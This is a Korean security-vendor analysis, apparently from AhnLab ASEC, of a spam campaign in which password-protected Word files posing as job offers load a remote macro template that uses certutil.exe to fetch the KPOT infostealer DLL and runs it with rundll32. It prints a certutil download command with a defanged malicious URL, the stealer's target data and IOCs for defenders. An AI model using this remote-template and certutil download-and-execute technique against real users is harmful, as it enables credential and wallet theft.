Job Offer Letter로 위장한 악성코드

ASEC 분석팀은 최근 스팸메일에 첨부된 워드파일을 통해 인포스틸러 유형의 KPOT 악성코드를 유포하는 정황을 확인하였다. 매크로 허용 시 최종적으로 인포스틸러 유형의 악성코드를 내려받는 사례는 종종 있었으나, 사용자를 속이기 위해 Job Offer Letter로 위장한 스팸메일에 특정암호가 걸린 워드파일을 이용한 것이 포인트라고 할 수 있다.

그림1) 악성코드 동작과정

스팸메일의 정확한 유입경로는 파악되지 않았으나, Job Offer Letter의 내용을 담은 것과 수신인을 구분하여 부여한 것처럼 보이는 비밀번호를 메일 본문에 기재한 것으로 보아 사용자를 속이기 위해 좀 더 교묘한 방법을 사용한 것으로 추정된다.

  • 발신인 : Team Lead
  • 메일 제목 : Our Team Job Invitation
  • 메일 본문 : Hello, our invitation is attached to this message. Your personal password: TBBEx○○○○○○○○○○UP3Vm

메일 본문에 기재된 비밀번호를 입력하면 압축파일이 해제된다. OOXML(Office Open XML) 포맷의 정상적인 XML Relationship을 이용하여 Target주소만 악성 URL을 이용하기 때문에, 파일 바이너리만으로는 악성 여부를 판단하기가 어렵다. 아래의 그림3)과 같이 settings.xml.rels 파일 내에 악성매크로와 페이로드가 포함된 원격 템플릿을 로드할 수 있는 URL이 존재하는데, 사용자가 워드파일을 실행시키기만 하여도 외부 악성URL에 접속을 시도하는 특징을 가진다.

그림2) 암호화 압축된 악성 워드파일. 패스워드는 메일 본문에 존재한다.
그림3) 문서에 삽입된 악성 URL
그림4) 워드파일 실행 시 자동으로 악성 URL에 접속 시도

DOTM 파일은 난독화 되어있는 악성 매크로 코드를 포함하고 있다. 매크로가 실행되면 윈도우 정상 프로세스인 certutil.exe 에 의해 KPOT 악성코드를 내려받게되며 이후 dll 형태의 악성코드를 rundll32.exe 로 실행한다.

certutil.exe 는 윈도우에서 인증서를 관리할 때 사용하는 기본 프로그램이지만, ‘certutil.exe -urlcache -split -f [URL] [output.file]’ 과 같은 방식으로 원격URL에서 인증서 혹은 다른 파일을 다운로드하여 로컬파일로 저장할 수 있기 때문에 이와 같은 방식으로 악성코드 유포에 사용되기도 한다.

난독화 되어있는 매크로 코드 디버깅 시 아래와 같이 외부 URL에서 dll 파일을 %TMP% 경로로 내려받는 것을 알 수 있다. 여기서 내려받아지는 파일이 인포스틸러 유형의 KPOT 악성코드이다.

certutil.exe -urlcache -split -f hxxps://donattelli[.]com/test/ssi/1.dll C:\Users\[User]\AppData\Local\Temp\rad6FECC.tmp.dll
그림 5) 매크로코드 디버깅 시 확인되는 DOCM 다운로드URL 및 실행방법
그림 6) Child Process 로 확인되는 certutil.exe & rundll32.exe

KPOT 악성코드는 인터넷 브라우저, FTP 클라이언트, VPN 클라이언트, 메신저, 암호화폐지갑에서 데이터를 훔치는 악성코드이다. 자사 분석 인프라 RAPIT 를 통해 WS_FTP / FileZilla / WinSCP 의 설정파일과 Outlook 어플리케이션의 계정정보에 대한 접근 시도가 확인된다.

아래의 그림 8) 에서 알 수 있듯이 코드 상으로도 사용자의 PC 정보 뿐만 아니라 다양한 애플리케이션의 정보를 탈취하는 것을 확인할 수 있다.

그림 7) 자사 인프라 RAPIT 에서 확인되는 KPOT 인포스틸러의 악성행위
그림 8) KPOT Infostealer 내부코드 일부 발췌

스팸메일을 통해 유입되는 악성코드의 비중이 매우 높으므로 사용자들은 출처가 불분명한 메일의 첨부파일 실행을 자제해야한다. 물론, 신뢰할만한 사람으로부터 메일을 받더라도 발신인의 메일 주소를 한번 더 확인해야 하는 것과 기본적으로는 메일 내의 첨부 파일을 실행하지 않도록 주의를 기울이는 습관이 필요하다.

또한, 사용하고 있는 안티바이러스 제품의 엔진 패턴 버전을 항상 최신으로 업데이트하여 사용할 것을 권장한다.

안랩 V3제품군에서는 본문에서 소개한 악성파일들에 대해 아래와 같이 진단하고 있다.

[파일진단]
Downloader/DOC.Generic
Downloader/DOC.Agent
Infostealer/Win.KPot.C4565958

[행위진단]
Execution/MDP.Command.M3803

[IOC]
dc3f839b6f2a8c1833d9ae4e4f8dc4c6
23a471d956410bc80dc0cabc006252f6
1ea7d46d94299fa8bad4043c13100df0
hxxps://donattelli[.]com


연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.

0 0 votes
별점 주기
guest
0 댓글
Inline Feedbacks
View all comments